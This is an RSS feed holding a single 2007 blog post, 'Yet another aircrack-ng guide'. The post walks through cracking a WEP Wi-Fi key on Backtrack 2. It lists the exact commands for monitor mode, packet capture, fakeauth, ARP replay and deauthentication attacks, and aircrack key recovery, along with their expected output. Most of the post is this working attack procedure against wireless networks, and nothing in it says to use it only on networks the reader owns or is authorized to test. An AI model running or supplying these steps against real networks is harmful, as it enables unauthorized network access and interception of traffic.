<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>the new cube 2.0 &#187; crack</title>
	<atom:link href="http://jiehong.org/blog/tag/crack/feed/" rel="self" type="application/rss+xml" />
	<link>http://jiehong.org/blog</link>
	<description>the new cube 2.0</description>
	<lastBuildDate>Sat, 21 Jan 2012 17:43:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Yet another aircrack-ng guide</title>
		<link>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/</link>
		<comments>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/#comments</comments>
		<pubDate>Thu, 27 Dec 2007 18:25:01 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[linksys]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wusb54gc]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/</guid>
		<description><![CDATA[I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with Aircrack-ng. So let&#8217;s get started then..Back Track 2 loaded with the rt73 drivers. The following commands is to get your WUSB54GC dongle into the monitor/injection mode. &#8220;ifconfig rausb0 up&#8221; &#8220;iwconfig rausb0 mode monitor channel 1 [...]]]></description>
			<content:encoded><![CDATA[<p>I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with <a title="Aircrack-ng" href="http://www.aircrack-ng.org/" target="_blank">Aircrack-ng</a>.</p>
<p>So let&#8217;s get started then..Back Track 2 loaded with the rt73 drivers.</p>
<p>The following commands is to get your WUSB54GC dongle into the monitor/injection mode.</p>
<p>&#8220;ifconfig rausb0 up&#8221;</p>
<p>&#8220;iwconfig rausb0 mode monitor channel 1 rate 1M&#8221;</p>
<p>&#8220;iwpriv rausb0 forceprism 1&#8243;</p>
<p>&#8220;iwpriv rausb0 rfmontx 1&#8243;</p>
<p><span id="more-84"></span></p>
<p>I have yet to find out what those iwpriv does other than turning on some private IO controls within the card or drivers.</p>
<p>To verify that your card is ready for injecting, execute &#8220;aireplay-ng &#8211;test rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Trying broadcast probe requests&#8230;<br />
Injection is working!<br />
Found 15 APs</p>
<p>Now we are ready, open the first console and execute the following command</p>
<p>&#8220;airodump-ng &#8211;ivs -w capture &#8211;encrypt wep -a rausb0&#8243;</p>
<p>and it  will return with a list of APs by BSSID, PWR, CH, ESSID and other interesting fields and data dumped to a capture-0x.ivs</p>
<p>Once you have determine your target, you may want to re-run airodump and filter by the BSSID or leave the command running to collect the IVs.</p>
<p>Next, we will execute a series of commands in different consoles together.</p>
<p>The fakeauth attack &#8220;aireplay-ng &#8211;fakeauth 10 -e MySSID -a 00:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Waiting for beacon frame (BSSID: 00:XX:XX:XX:XX:XX)<br />
Sending Authentication Request<br />
Authentication successful<br />
Sending Association Request<br />
Association successful <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>The ARP replay attack &#8220;aireplay-ng &#8211;arpreplay -e &lt;ESSID&gt; -b &lt;BSSID&gt; -h 00:11:22:33:44:55 rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Saving ARP requests in replay_arp-xxxxx.cap<br />
You should also start airodump-ng to capture replies.<br />
Read 53965 packets (got 31064 ARP requests), sent 48076 packets&#8230;(319 pps)</p>
<p>Here&#8217;s the part where I don&#8217;t get it.</p>
<p>Sometimes you have to run a deauth attack to get some ARP packets coming, sometimes I don&#8217;t need to.</p>
<p>aireplay-ng &#8211;deauth 10 -e MySSID -a &lt;00:XX:XX:XX:XX:XX&gt; -h 00:11:22:33:44:55 rausb0</p>
<p>Finally after collecting about 100k for 64bit WEP till 500k for 128bit WEP of IV packets, you may execute &#8220;aircrack-ng -b 00:XX:XX:XX:XX:XX capture-0x.ivs&#8221;</p>
<p>You should see the following:</p>
<p>[00:00:00] Tested 1 keys (got 208713 IVs)</p>
<p>KB    depth   byte(vote)<br />
0    0/  1   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>0    0/  2   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>.</p>
<p>.</p>
<p>0    0/  5   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>KEY FOUND! [ XX:XX:XX:XX:XX ]<br />
Decrypted correctly: 100%</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

